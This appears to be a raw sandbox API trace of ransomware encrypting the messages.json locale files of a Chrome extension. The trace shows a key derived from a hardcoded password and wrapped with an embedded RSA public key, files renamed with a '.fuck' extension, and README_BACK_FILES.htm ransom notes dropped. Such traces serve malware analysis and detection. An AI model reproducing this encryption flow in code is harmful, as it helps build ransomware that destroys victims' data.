[0257.921] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.921] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e799d8) returned 1 [0257.921] CryptImportPublicKeyInfo (in: hCryptProv=0x2e799d8, dwCertEncodingType=0x1, pInfo=0x2e25850*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25880*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25888*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fb80) returned 1 [0257.921] CryptEncrypt (in: hKey=0x2e7fb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.921] CryptEncrypt (in: hKey=0x2e7fb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79488*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79488*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.921] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e79488*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79488*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.923] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xbe, lpOverlapped=0x0) returned 1 [0257.924] CryptEncrypt (in: hKey=0x2e7fa40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xbe, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.924] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.924] CloseHandle (hObject=0x5d5c) returned 1 [0257.924] CloseHandle (hObject=0x5d60) returned 1 [0257.924] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0257.927] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0257.928] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.gsg")) returned 1 [0257.929] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\messages.json.fuck")) returned 1 [0257.930] CryptDestroyHash (hHash=0x2e7fe40) returned 1 [0257.931] CryptDestroyKey (hKey=0x2e7fa40) returned 1 [0257.931] CryptReleaseContext (hProv=0x2e79b70, dwFlags=0x0) returned 1 [0257.931] FindNextFileA (in: hFindFile=0x2e7fac0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.931] FindClose (in: hFindFile=0x2e7fac0 | out: hFindFile=0x2e7fac0) returned 1 [0257.931] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0257.931] AreFileApisANSI () returned 1 [0257.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.931] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.932] GetFileType (hFile=0x5d50) returned 0x1 [0257.932] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.933] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.933] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fb00 [0257.933] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.933] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.934] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.934] GetLastError () returned 0x0 [0257.934] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json")) returned 0x20 [0257.934] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0257.935] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.935] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.936] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.937] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0257.938] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.938] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.938] CryptHashData (hHash=0x2e7fe40, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.939] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e7fe40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fd80) returned 1 [0257.939] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.939] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.939] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79730) returned 1 [0257.939] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79730, dwCertEncodingType=0x1, pInfo=0x2e24810*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24840*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24848*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7ff40) returned 1 [0257.939] CryptEncrypt (in: hKey=0x2e7ff40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.939] CryptEncrypt (in: hKey=0x2e7ff40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e79a60*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e79a60*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.939] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e79a60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e79a60*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.940] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x104, lpOverlapped=0x0) returned 1 [0257.941] CryptEncrypt (in: hKey=0x2e7fd80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x104, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0257.941] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0257.941] CloseHandle (hObject=0x5d60) returned 1 [0257.941] CloseHandle (hObject=0x5d5c) returned 1 [0257.941] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0257.944] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0257.944] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.gsg")) returned 1 [0257.945] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\messages.json.fuck")) returned 1 [0257.947] CryptDestroyHash (hHash=0x2e7fe40) returned 1 [0257.947] CryptDestroyKey (hKey=0x2e7fd80) returned 1 [0257.947] CryptReleaseContext (hProv=0x2e796a8, dwFlags=0x0) returned 1 [0257.947] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.947] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0257.947] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0257.947] AreFileApisANSI () returned 1 [0257.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.947] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.948] GetFileType (hFile=0x5d50) returned 0x1 [0257.948] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.950] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.950] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fb00 [0257.951] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.951] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.951] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.952] GetLastError () returned 0x0 [0257.952] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json")) returned 0x20 [0257.952] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0257.953] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.953] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.954] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.954] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e796a8) returned 1 [0257.957] CryptCreateHash (in: hProv=0x2e796a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.957] lstrlenA (lpString="WcJIVquNvpAEukoBQHzQwvMnzMlQm") returned 29 [0257.957] CryptHashData (hHash=0x2e80080, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.957] CryptDeriveKey (in: hProv=0x2e796a8, Algid=0x6610, hBaseData=0x2e80080, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7fe80) returned 1 [0257.957] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.957] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.957] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e79b70) returned 1 [0257.958] CryptImportPublicKeyInfo (in: hCryptProv=0x2e79b70, dwCertEncodingType=0x1, pInfo=0x2e24cf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24d20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24d28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7fac0) returned 1 [0257.958] CryptEncrypt (in: hKey=0x2e7fac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.958] CryptEncrypt (in: hKey=0x2e7fac0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e797b8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e797b8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.958] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e797b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e797b8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.959] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0257.961] CryptEncrypt (in: hKey=0x2e7fe80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.961] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.961] CloseHandle (hObject=0x5d5c) returned 1 [0257.961] CloseHandle (hObject=0x5d60) returned 1 [0257.961] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0257.966] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 